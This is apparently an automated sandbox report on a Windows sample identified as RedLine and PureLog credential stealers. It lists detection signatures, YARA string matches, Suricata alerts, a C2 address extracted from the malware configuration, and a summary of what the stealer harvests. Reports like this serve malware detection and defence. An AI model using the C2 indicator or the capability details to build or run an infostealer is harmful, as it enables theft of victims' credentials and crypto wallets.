Edit tour

Windows Analysis Report
chTJmCR9bS.exe

Overview

General Information

Sample name:	chTJmCR9bS.exe renamed because original name is a hash value
Original sample name:	963F526636C53E9ECF5AF8025E0DACA0.exe
Analysis ID:	1594596
MD5:	963f526636c53e9ecf5af8025e0daca0
SHA1:	bf41a267e768fca782e6861ba274aac58f79a959
SHA256:	55d48276b91ae07b4a4b26ab074d2fae49ffdee7f227fc62587a46696ecbf2b3
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

chTJmCR9bS.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\chTJmCR9bS.exe" MD5: 963F526636C53E9ECF5AF8025E0DACA0)

chTJmCR9bS.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\chTJmCR9bS.exe" MD5: 963F526636C53E9ECF5AF8025E0DACA0)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.57.84:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1435a:$a4: get_ScannedWallets 0x131b8:$a5: get_ScanTelegram 0x13fde:$a6: get_ScanGeckoBrowsersPaths 0x11dfa:$a7: <Processes>k__BackingField 0xfd0c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1172e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x77daa:$a4: get_ScannedWallets 0x8f9ca:$a4: get_ScannedWallets 0x76c08:$a5: get_ScanTelegram 0x8e828:$a5: get_ScanTelegram 0x77a2e:$a6: get_ScanGeckoBrowsersPaths 0x8f64e:$a6: get_ScanGeckoBrowsersPaths 0x7584a:$a7: <Processes>k__BackingField 0x8d46a:$a7: <Processes>k__BackingField 0x7375c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x8b37c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x7517e:$a9: <ScanFTP>k__BackingField 0x8cd9e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1823596554.000000000343E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7384	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7384	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7384	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x42152:$a4: get_ScannedWallets 0x5e9b0:$a4: get_ScannedWallets 0x40ff9:$a5: get_ScanTelegram 0x5d857:$a5: get_ScanTelegram 0x41ddb:$a6: get_ScanGeckoBrowsersPaths 0x5e639:$a6: get_ScanGeckoBrowsersPaths 0x3fc8c:$a7: <Processes>k__BackingField 0x5c4ea:$a7: <Processes>k__BackingField 0x3d1bf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x59a1d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f5c0:$a9: <ScanFTP>k__BackingField 0x5be1e:$a9: <ScanFTP>k__BackingField
Process Memory Space: chTJmCR9bS.exe PID: 7572	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7572	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: chTJmCR9bS.exe PID: 7572	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x59c96:$a4: get_ScannedWallets 0x58b3d:$a5: get_ScanTelegram 0x5991f:$a6: get_ScanGeckoBrowsersPaths 0x577d0:$a7: <Processes>k__BackingField 0x54d03:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x57104:$a9: <ScanFTP>k__BackingField
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.chTJmCR9bS.exe.5cd0000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.chTJmCR9bS.exe.3721508.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.chTJmCR9bS.exe.450ad90.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.chTJmCR9bS.exe.450ad90.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.chTJmCR9bS.exe.450ad90.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.chTJmCR9bS.exe.450ad90.3.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.chTJmCR9bS.exe.450ad90.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.chTJmCR9bS.exe.43ab7e0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.chTJmCR9bS.exe.43ab7e0.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.chTJmCR9bS.exe.43ab7e0.4.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.chTJmCR9bS.exe.43ab7e0.4.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.chTJmCR9bS.exe.43ab7e0.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
2.2.chTJmCR9bS.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.chTJmCR9bS.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.chTJmCR9bS.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
2.2.chTJmCR9bS.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
2.2.chTJmCR9bS.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.chTJmCR9bS.exe.3721508.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x295eb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2961f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29648:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2b887:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2ae03:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b14b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2aa81:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x2826f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x20358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x20d38:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet
0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.chTJmCR9bS.exe.34ff6fc.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.chTJmCR9bS.exe.3446d9c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 26 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:19.516256+0100	2045000	1	Malware Command and Control Activity Detected	185.222.57.84	55615	192.168.2.4	49741	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:22.103197+0100	2046056	1	A Network Trojan was detected	185.222.57.84	55615	192.168.2.4	49741	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:22.103197+0100	2045001	1	Malware Command and Control Activity Detected	185.222.57.84	55615	192.168.2.4	49741	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:14.490257+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49741	185.222.57.84	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:19.724822+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49741	185.222.57.84	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:24.045230+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.222.57.84	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:22.471503+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49744	185.222.57.84	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-19T13:02:14.490257+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49741	185.222.57.84	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.57.84:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: chTJmCR9bS.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: chTJmCR9bS.exe

Joe Sandbox ML: detected

Source: chTJmCR9bS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49743 version: TLS 1.0

Source: chTJmCR9bS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49741 -> 185.222.57.84:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49741 -> 185.222.57.84:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49744 -> 185.222.57.84:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49745 -> 185.222.57.84:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.84:55615 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49741 -> 185.222.57.84:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.84:55615 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.84:55615 -> 192.168.2.4:49741

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.57.84:55615

Uses known network protocols on non-standard ports

